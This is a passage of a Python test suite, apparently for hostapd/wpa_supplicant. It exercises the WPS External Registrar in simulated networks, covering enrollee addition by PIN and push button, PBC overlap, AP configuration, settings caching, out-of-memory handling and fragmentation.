"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("WPS configuration step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
logger.info("Learn AP configuration through UPnP")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
logger.info("Add a specific Enrollee using ER (PBC/UUID)")
addr1 = dev[1].p2p_interface_addr()
dev[0].dump_monitor()
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PBC %s" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr1 not in ev:
raise Exception("Unexpected Enrollee MAC address")
uuid = ev.split(' ')[1]
dev[0].request("WPS_ER_PBC " + uuid)
dev[1].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
logger.info("Add a specific Enrollee using ER (PIN/UUID)")
pin = dev[2].wps_read_pin()
addr2 = dev[2].p2p_interface_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
uuid = ev.split(' ')[1]
dev[0].request("WPS_ER_PIN " + uuid + " " + pin)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-REMOVE"], timeout=15)
if ev is None:
raise Exception("No Enrollee STA entry timeout seen")
logger.info("Stop ER")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_multi_add_enrollee(dev, apdev):
"""Multiple WPS ERs adding a new enrollee using PIN"""
try:
_test_ap_wps_er_multi_add_enrollee(dev, apdev)
finally:
for i in range(2):
dev[i].request("WPS_ER_STOP")
def _test_ap_wps_er_multi_add_enrollee(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
'friendly_name': "WPS AP",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
for i in range(2):
dev[i].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[i].wps_reg(apdev[0]['bssid'], ap_pin)
for i in range(2):
dev[i].request("WPS_ER_START ifname=lo")
for i in range(2):
ev = dev[i].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
dev[i].dump_monitor()
for i in range(2):
dev[i].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
for i in range(2):
ev = dev[i].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[i].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
pin = dev[2].wps_read_pin()
addr = dev[2].own_addr()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + addr)
dev[1].dump_monitor()
dev[1].request("WPS_ER_PIN any " + pin + " " + addr)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[2].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[2].wait_connected(timeout=15)
def test_ap_wps_er_add_enrollee_pbc(dev, apdev):
"""WPS ER connected to AP and adding a new enrollee using PBC"""
try:
_test_ap_wps_er_add_enrollee_pbc(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee_pbc(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Learn AP configuration")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
enrollee = dev[1].p2p_interface_addr()
if "FAIL-UNKNOWN-UUID" not in dev[0].request("WPS_ER_PBC " + enrollee):
raise Exception("Unknown UUID not reported")
logger.info("Add Enrollee using ER and PBC")
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[1].request("WPS_PBC")
for i in range(0, 2):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
if enrollee in ev:
break
if i == 1:
raise Exception("Expected Enrollee not found")
if "FAIL-NO-AP-SETTINGS" not in dev[0].request("WPS_ER_PBC " + enrollee):
raise Exception("Unknown UUID not reported")
logger.info("Use learned network configuration on ER")
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " 0")
if "OK" not in dev[0].request("WPS_ER_PBC " + enrollee):
raise Exception("WPS_ER_PBC failed")
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
hwsim_utils.test_connectivity_sta(dev[0], dev[1])
def test_ap_wps_er_pbc_overlap(dev, apdev):
"""WPS ER connected to AP and PBC session overlap"""
try:
_test_ap_wps_er_pbc_overlap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_pbc_overlap(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[2].scan_for_bss(apdev[0]['bssid'], freq="2412")
# avoid leaving dev 1 or 2 as the last Probe Request to the AP
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412, force_scan=True)
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
# verify BSSID selection of the AP instead of UUID
if "FAIL" in dev[0].request("WPS_ER_SET_CONFIG " + apdev[0]['bssid'] + " 0"):
raise Exception("Could not select AP based on BSSID")
dev[0].dump_monitor()
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[2].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
ev = dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
found1 = False
found2 = False
addr1 = dev[1].own_addr()
addr2 = dev[2].own_addr()
for i in range(3):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
if addr1 in ev:
found1 = True
if found2:
break
if addr2 in ev:
found2 = True
if found1:
break
if dev[0].request("WPS_ER_PBC " + ap_uuid) != "FAIL-PBC-OVERLAP\n":
raise Exception("PBC overlap not reported")
dev[1].request("WPS_CANCEL")
dev[2].request("WPS_CANCEL")
if dev[0].request("WPS_ER_PBC foo") != "FAIL\n":
raise Exception("Invalid WPS_ER_PBC accepted")
def test_ap_wps_er_v10_add_enrollee_pin(dev, apdev):
"""WPS v1.0 ER connected to AP and adding a new enrollee using PIN"""
try:
_test_ap_wps_er_v10_add_enrollee_pin(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_v10_add_enrollee_pin(dev, apdev):
ssid = "wps-er-add-enrollee-pbc"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Learn AP configuration")
dev[0].request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
logger.info("Use learned network configuration on ER")
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " 0")
logger.info("Add Enrollee using ER and PIN")
enrollee = dev[1].p2p_interface_addr()
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + enrollee)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
@remote_compatible
def test_ap_wps_er_config_ap(dev, apdev):
"""WPS ER configuring AP over UPnP"""
try:
_test_ap_wps_er_config_ap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_config_ap(dev, apdev):
ssid = "wps-er-ap-config"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("Connect ER to the AP")
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
logger.info("WPS configuration step")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
new_passphrase = "1234567890"
dev[0].request("WPS_ER_CONFIG " + apdev[0]['bssid'] + " " + ap_pin + " " +
binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " +
binascii.hexlify(new_passphrase.encode()).decode())
ev = dev[0].wait_event(["WPS-SUCCESS"])
if ev is None:
raise Exception("WPS ER configuration operation timed out")
dev[0].wait_disconnected(timeout=10)
dev[0].connect(ssid, psk="1234567890", scan_freq="2412")
logger.info("WPS ER restart")
dev[0].request("WPS_ER_START")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out on ER restart")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found on ER restart")
if "OK" not in dev[0].request("WPS_ER_STOP"):
raise Exception("WPS_ER_STOP failed")
if "OK" not in dev[0].request("WPS_ER_STOP"):
raise Exception("WPS_ER_STOP failed")
@remote_compatible
def test_ap_wps_er_cache_ap_settings(dev, apdev):
"""WPS ER caching AP settings"""
try:
_test_ap_wps_er_cache_ap_settings(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
time.sleep(0.2)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_cache_ap_settings_oom(dev, apdev):
"""WPS ER caching AP settings (OOM)"""
try:
_test_ap_wps_er_cache_ap_settings_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
with alloc_fail(dev[0], 1, "=wps_er_ap_use_cached_settings"):
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_cache_ap_settings_oom2(dev, apdev):
"""WPS ER caching AP settings (OOM 2)"""
try:
_test_ap_wps_er_cache_ap_settings_oom2(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_cache_ap_settings_oom2(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
with alloc_fail(dev[0], 1, "=wps_er_ap_cache_settings"):
hapd.disable()
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-REMOVE",
"CTRL-EVENT-DISCONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP removal or disconnection timed out")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(2):
ev = dev[0].wait_event([ "WPS-ER-AP-ADD", "CTRL-EVENT-CONNECTED" ],
timeout=15)
if ev is None:
raise Exception("AP discovery or connection timed out")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_subscribe_oom(dev, apdev):
"""WPS ER subscribe OOM"""
try:
_test_ap_wps_er_subscribe_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_subscribe_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
id = int(dev[0].list_networks()[0]['id'])
dev[0].set_network(id, "scan_freq", "2412")
with alloc_fail(dev[0], 1, "http_client_addr;wps_er_subscribe"):
dev[0].request("WPS_ER_START ifname=lo")
for i in range(50):
res = dev[0].request("GET_ALLOC_FAIL")
if res.startswith("0:"):
break
time.sleep(0.1)
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=0)
if ev:
raise Exception("Unexpected AP discovery during OOM")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_er_set_sel_reg_oom(dev, apdev):
"""WPS ER SetSelectedRegistrar OOM"""
try:
_test_ap_wps_er_set_sel_reg_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_set_sel_reg_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP not discovered")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL timed out")
time.sleep(0.1)
for func in [ "http_client_url_parse;wps_er_send_set_sel_reg",
"wps_er_soap_hdr;wps_er_send_set_sel_reg",
"http_client_addr;wps_er_send_set_sel_reg",
"wpabuf_alloc;wps_er_set_sel_reg" ]:
with alloc_fail(dev[0], 1, func):
if "OK" not in dev[0].request("WPS_ER_PBC " + ap_uuid):
raise Exception("WPS_ER_PBC failed")
ev = dev[0].wait_event(["WPS-PBC-ACTIVE"], timeout=3)
if ev is None:
raise Exception("WPS-PBC-ACTIVE not seen")
dev[0].request("WPS_ER_STOP")
@remote_compatible
def test_ap_wps_er_learn_oom(dev, apdev):
"""WPS ER learn OOM"""
try:
_test_ap_wps_er_learn_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_learn_oom(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin)
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP not discovered")
for func in [ "wps_er_http_put_message_cb",
"xml_get_base64_item;wps_er_http_put_message_cb",
"http_client_url_parse;wps_er_ap_put_message",
"wps_er_soap_hdr;wps_er_ap_put_message",
"http_client_addr;wps_er_ap_put_message" ]:
with alloc_fail(dev[0], 1, func):
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=1)
if ev is not None:
raise Exception("AP learn succeeded during OOM")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=10)
if ev is None:
raise Exception("AP learn did not succeed")
if "FAIL" not in dev[0].request("WPS_ER_LEARN 00000000-9e5c-4e73-bd82-f89cbcd10d7e " + ap_pin):
raise Exception("WPS_ER_LEARN for unknown AP accepted")
dev[0].request("WPS_ER_STOP")
def test_ap_wps_fragmentation(dev, apdev):
"""WPS with fragmentation in EAP-WSC and mixed mode WPA+WPA2"""
ssid = "test-wps-fragmentation"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP", "ap_pin": appin,
"fragment_size": "50" })
logger.info("WPS provisioning step (PBC)")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
dev[0].request("SET wps_fragment_size 50")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("WPS provisioning step (PIN)")
pin = dev[1].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("SET wps_fragment_size 50")
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].wait_connected(timeout=30)
status = dev[1].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("WPS connection as registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].request("SET wps_fragment_size 50")
dev[2].wps_reg(apdev[0]['bssid'], appin)
status = dev[2].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
